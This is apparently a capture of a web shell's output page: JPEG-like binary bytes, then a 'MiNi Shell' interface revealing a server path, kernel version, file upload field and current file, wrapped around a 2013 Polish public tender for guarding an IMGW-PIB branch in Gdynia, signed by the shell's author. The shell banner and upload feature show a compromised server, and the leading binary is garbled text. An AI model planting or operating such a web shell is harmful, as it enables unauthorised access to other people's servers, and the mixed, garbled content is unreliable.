JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130207/52706-N-2013.html

<p class="kh_header"><b>Warszawa: Usługa ochrony fizycznej mienia i osób w Oddziale Morskim IMGW - PIB 
w Gdyni,  ul. Waszyngtona 42</b><br>
<b>Numer ogłoszenia: 52706 - 2013; data zamieszczenia: 07.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Meteorologii i Gospodarki Wodnej - Państwowy Instytut Badawczy , ul. Podleśna 61, 01-673 Warszawa, woj. mazowieckie, tel. 22 5694230, 5694416, 5694263, faks 22 5694415.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.imgw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: PAŃSTWOWY INSTYTUT BADAWCZY.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa ochrony fizycznej mienia i osób w Oddziale Morskim IMGW - PIB 
w Gdyni,  ul. Waszyngtona 42.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi stałej,  bezpośredniej ochrony fizycznej  mienia i osób w obiektach Oddziału Morskiego IMGW - PIB, zlokalizowanych w Gdyni przy ul. Waszyngtona 42. 
Powierzchnia terenu: ok 700m2 z infrastrukturą techniczną. 
Budynek główny: 4 kondygnacje + piwnice - kubatura 4 300m2
Budynek B: 2 kondygnacje, w tym ciąg garaży - kubatura 750m2
Drugi ciąg garaży - kubatura 350m2
Ochrona będzie realizowana w systemie zmianowym (1 pracownik ochrony na zmianie), całodobowo, wszystkie dni tygodnia. 
Zamawiający wymaga zapewnienia pracownikom ochrony stałej wsparcia grupy interwencyjnej w gotowości do natychmiastowego wysłania na obszar ochrony. 
Szczegółowy opis przedmiotu zamówienia został określony w załączniku nr 6 do SIWZ tj. 1. Ochrona realizowana będzie w systemie zmianowym, całodobowo przez wszystkie dni tygodnia. 
    W skład każdej zmiany musi wchodzić 1 pracownik ochrony na posterunku stałym zlokalizowanym                
    w budynku głównym. 
2. Wykonawca obowiązany jest zapewnić obsadę posterunku wraz z wyposażeniem technicznym 
    umożliwiającym pełnienie ochrony oraz  wspomaganie ochrony, w razie zaistnienia potrzeby, 
    załogą interwencyjną. 
    Dojazd grupy interwencyjnej w składzie zapewniającym właściwe wzmocnienie ochranianego 
    obiektu w czasie do 15 minut w godzinach 06:00 - 22:00.  
    w czasie do 10 minut w godzinach 22:00 - 06:00.  
3. Obserwacje monitorów wizyjnych przesyłających obraz z kamer rozmieszczonych na terenie 
    obiektów i w ich otoczeniu zewnętrznym.
4. Prowadzenie działań zapobiegających przestępstwom i wykroczeniom przeciwko mieniu,                            
    w szczególności: kradzieżom,  włamaniom i innym formom wyprowadzenia mienia poza teren 
    Oddziału IMGW oraz zapobieganie  powstaniu szkody wynikającej z tych zdarzeń. 
5. Dozorowanie zainstalowanych w siedzibie Zamawiającego systemów: monitoringu, sygnalizacji 
    wykrywania pożaru. 
6. Okresowe, prewencyjne  obchody terenu objętego ochroną w godzinach 18:00-06:00, nie rzadziej 
    niż co 2 godziny. 
7. Kontrola ruchu osobowego, w tym:
    a) ewidencjonowanie wizyt osób nie wyposażonych w identyfikator Zamawiającego; 
    b) kontrola dokumentów uprawniających  do wstępu i przebywania na terenie obiektu objętego   
        ochroną;
    c) zabezpieczenie i ochrona obiektów przed przedostaniem się na teren osób nieuprawnionych , 
        nietrzeźwych lub w inny sposób mogących  stanowić zagrożenie dla pracowników, 
        współpracowników, gości i mienia Oddziału;
    d) zwracanie uwagi na wnoszone lub pozostawione bez opieki podejrzanie wyglądające bagaże lub 
         pakunki.;
    e) kontrola przestrzegania przez osoby przebywające na terenie  podlegającemu ochronie 
        obowiązujących przepisów porządkowych, ochronnych i przeciwpożarowych i ustawy o 
        wychowaniu w trzeźwości; 
    f)  zwracanie uwagi na osoby palące w miejscach niedozwolonych;
    g) ścisłe przestrzeganie aktualnie obowiązujących instrukcji, decyzji i poleceń dyrektora Oddziału 
        Morskiego IMGW - PIB. 
8. Reagowanie na sygnały alarmowe oraz  podejmowanie natychmiastowych działań interwencyjnych         
    zgodnie z obowiązującymi instrukcjami bezpieczeństwa. 


9.   Reagowanie i natychmiastowe zgłaszanie  osobie wyznaczonej z ramienia Zamawiającego oraz 
       powiadomienie odpowiednich  służb i swoich przełożonych o wszelkich awariach, zdarzeniach, 
       zagrożeniach dla mienia, zdrowia lub życia osób przebywających na terenie objętym ochronie                 
       a  także wpisywanie tych zdarzeń  i podjętych działań w książce raportów. 
10. Pracownicy Wykonawcy zobowiązani są do niezwłocznego powiadamiania bezpośrednich           
       przełożonych, koordynatora z ramienia Zamawiającego oraz najbliższej jednostki policji                                          
       o przestępstwach i nadzwyczajnych wydarzeniach zaistniałych na terenie objętym ochroną oraz    
       w jego najbliższym otoczeniu, jak również podejmowania niezbędnych czynności, celem 
       zabezpieczenia  śladów i dowodów przestępstwa. 
11. Ochrona parkingu wraz ze znajdującymi sie na nim pojazdami, w razie potrzeby obsługa wjazdu                   
       i wyjazdu samochodów z parkingu.
12. Ochrona obiektu przed wszelkimi działaniami niepożądanymi ze strony osób trzecich                                                
       w szczególności zapobieganie i  interweniowanie  zakłóceniom porządku, dewastacji, sabotażu, 
       terroryzmu, wandalizmu. 
13. Po zakończeniu pracy przez pracowników Zamawiającego sprawdzenie wszystkich wejść, wyjść, 
       korytarzy, pomieszczeń (zamknięcie okien, wyłączenie zbędnego oświetlenia) mając na uwadze    
       prawidłowe zabezpieczenie obiektów. 
14. Wydawanie  kluczy do pomieszczeń służbowych pracownikom uprawnionym. 
15. Prowadzenie książki raportów z przebiegu służby..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.03.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca składający ofertę zobowiązany jest do wniesienia przed upływem terminu składania ofert wadium w wysokości 6 000zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeśli udokumentuje, że posiada  koncesję na 
wykonywanie usług ochrony   osób  i mienia wydaną przez Ministra Spraw Wewnętrznych i Administracji.
zgodnie z  ustawą  z dnia 22 sierpnia 1997r. o ochronie osób i mienia (Dz. U. z 2005r., Nr 145, poz. 1221 ze zm.)
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na podstawie analizy  złożonych dokumentów i oświadczeń, zgodnie z formułą  spełnia   nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony,  jeśli  Wykonawca  wykaże i udokumentuje należyte wykonanie,  a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług ,  co najmniej dwóch usług  bezpośredniej ochrony  osób i mienia  o wartości nie  mniejszej niż 120 000zł brutto każda w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest  krótszy - w tym okresie. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na podstawie analizy  złożonych dokumentów i oświadczeń, zgodnie z formułą  spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeśli wykaże, że dysponuje zespołem ludzi zdolnym do wykonania zamówienia tj. w zakresie ochrony bezpośredniej wykaże nie mniej niż 4 osoby (osoby niekarane), z co najmniej 2 letnim doświadczeniem w pracy na stanowisku pracownika ochrony oraz posiadanie zmotoryzowanej 
grupy interwencyjnej   z  osobami posiadającymi licencje pracowników ochrony,  co najmniej 3 osoby.
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na podstawie analizy  złożonych dokumentów i oświadczeń,  zgodnie z formułą  spełnia   nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeśli wykaże, że dysponuje zespołem ludzi zdolnym do wykonania zamówienia tj. w zakresie ochrony bezpośredniej wykaże nie mniej niż 4 osoby (osoby niekarane), z co najmniej 2 letnim doświadczeniem w pracy na stanowisku pracownika ochrony oraz posiadanie zmotoryzowanej 
grupy interwencyjnej   z  osobami posiadającymi licencje pracowników ochrony,  co najmniej 3 osoby.
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na podstawie analizy  złożonych dokumentów i oświadczeń,  zgodnie z formułą  spełnia   nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca udokumentuje, że posiada opłaconą polisę 
ubezpieczeniową  od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem 
zamówienia na wartość nie mniejszą niż 1 000 000zł. 
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na podstawie 
analizy  złożonych dokumentów i oświadczeń, , zgodnie z formułą  spełnia  nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień przyszłej umowy w stosunku do treści 
           umowy w sytuacji, gdy konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było 
            przewidzieć w chwili zawarcia umowy, a w szczególności, gdy: 
     a.  nastąpi zmiana powszechnie obowiązujących przepisów prawa mających wpływ na realizację zamówienia, 
           wynikną  rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny 
           sposób a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej 
           interpretacji jej  zapisów  przez strony;
     b.  zaistnieją zdarzenia siły wyższej, niezależne od stron umowy, które uniemożliwiłyby terminowe wykonanie 
           zobowiązań. Strony zobowiązują się do ustalenia odpowiednio zmienionego terminu wykonania przedmiotu 
           umowy. Za siłę wyższą uważa się zdarzenia zewnętrzne, których skutków nie da się przewidzieć ani im zapobiec.  
           W szczególności za siłę wyższą będzie się uważać działania sił przyrody takie jak: huragan, trzęsienie ziemi, 
           powódź, zamieszki, wojna.
      c.  konieczność wprowadzenia zmian będzie dotyczyć treści w dokumencie o charakterze informacyjno-
            instrukcyjnym, niezbędnym do sprawnej realizacji umowy w szczególności: zmiana osób uprawnionych do 
            kontaktów, zmiana osób odpowiedzialnych za potwierdzenie prawidłowej realizacji zamówienia wraz z numerami 
            telefonów, faksu, poczty elektronicznej etc. 
       d.  zaistnieją okoliczności powodujące konieczność zmiany podmiotów trzecich na etapie realizacji zamówienia na zasobach, których wykonawca opierał się wykazując spełnienie warunków udziału w postępowaniu, 
 pod warunkiem, że nowy podwykonawca wykaże spełnienie warunków w zakresie nie mniejszym niż wskazany 
 na etapie postępowania o zamówienie publiczne dotychczasowy podwykonawca.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.imgw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Meteorologii i Gospodarki Wodnej - PIB,  Oddział Morski                          
          w Gdyni,  81-342 Gdynia, ul. Waszyngtona 42,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.02.2013 godzina 09:45, miejsce: Instytut Meteorologii i Gospodarki Wodnej - PIB,  Oddział Morski                          
w Gdyni,  81-342 Gdynia, ul. Waszyngtona 42,
pok. 114 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com